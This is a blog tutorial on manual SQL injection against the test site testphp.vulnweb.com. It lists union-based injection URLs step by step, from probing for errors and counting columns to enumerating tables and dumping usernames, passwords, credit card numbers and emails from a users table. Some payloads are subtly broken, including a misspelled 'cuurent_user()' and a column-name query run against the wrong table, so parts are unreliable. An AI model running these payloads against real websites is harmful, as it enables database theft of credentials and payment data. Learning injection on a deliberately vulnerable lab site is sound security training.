This
article is based on our previous
article where you have learned different techniques to perform SQL injection
manually using dhakkan. Today we are again performing SQL injection manually on
a live website “vulnweb.com” in
order to reduce your stress of installing setup of dhakkan.
We are going to apply same concept and techniques as
performed in Dhakkan on different the platform
Let’s begin!
Open given below targeted URL in the browser
http://testphp.vulnweb.com/artist.php?artist=1 So here we are going test SQL
injection for “id=1
Now
use error base technique by adding an apostrophe
(‘) symbol at the end of input which
will try to break the query.
http://testphp.vulnweb.com/artist.php?artist=1’
In
the given screenshot you can see we have got error message which means the
running site is infected by SQL injection.
Now using ORDER BY
keyword to sort the records in ascending or descending order for id=1
Similarly repeating for order 2, 3 and so on one by one
From screenshot you can see we have got error at order by 4
which means it consist only three records.
Let’s penetrate more inside using union base injection to
select statement from different table.
http://testphp.vulnweb.com/artist.php?artist=1 union select 1,2,3
From screenshot
you can see it is show result for only one table not for others.
Now
try to pass wrong input into database through URL by replacing artist=1 from artist=-1 as given below:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,2,3
Hence you can see now it is showing the result for
remaining two tables also.
Use next query to fetch the name of database
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,database(),3
From screen shot you can read the database name acuart
Next query will extract current username as well as version
of database system
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,version(),cuurent_user()
Here we have retrieve 5.1.73
0ubuntu0 10.04.1 as version and acuart@localhost
as current user
Through next query we will try to fetch table name inside
the database
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables
where table_schema=database() limit 1,1
from screenshot you can name of first table is carts.
Similarly repeat the same query for another table with
slight change
http://testphp.vulnweb.com/artist.php?artist=-1
union select 1,table_name,3 from
information_schema.tables where table_schema=database() limit 2,1
We got table 2: categ
http://testphp.vulnweb.com/artist.php?artist=-1
union select 1,table_name,3 from
information_schema.tables where table_schema=database() limit 3,1
We got table 3:
featured
Similarly repeat same query for table 4, 5, 6, and 7 with
making slight changes in LIMIT.
http://testphp.vulnweb.com/artist.php?artist=-1
union select 1,table_name,3 from
information_schema.tables where table_schema=database() limit 7,1
We got table 7:
users
http://testphp.vulnweb.com/artist.php?artist=-1
union select 1,table_name,3 from
information_schema.tables where table_schema=database() limit 8,1
Since we didn’t get anything when limit is set 8, 1 hence
their might be 7 tables only inside the database.
concat function is use for concatenation of two or more
string into single string.
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(table_name),3
from information_schema.tables where table_schema=database()
From screen you can see through concat function we have
successfully retrieve all table name inside the
database.
Table1: artist
Table2: Carts
Table3: Featured
Table4: Guestbook
Table5: Pictures
Table6: Product
Table7: users
May
be we can get some important data from users
table, so let’s penetrate more inside. Again
Use concat function for table users for retrieving its entire column names.
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(column_name),3
from users
Awesome!! We successfully retrieve all eight column names
from inside the table users.
Then I have choose only four column i.e. uname, pass,email and cc for further enumeration.
Use concat function for selecting uname from table users by executing following query through URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(uname),3
from users
From screenshot you can read uname: test
Use concat function for selecting pass from table users by executing following query through URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(pass),3
from users
From screenshot you can read pass: test
Use
concat function for selecting cc
(credit card) from table users by executing following query through URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(cc),3 from
users
From
screenshot you can read cc: 1234-5678-2300-9000
Use concat function for selecting email from table users by executing following query through URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(email),3 from
users
From screenshot you can read email: jitendra@panalinks.com
Enjoy hacking!!
0 comments:
Post a Comment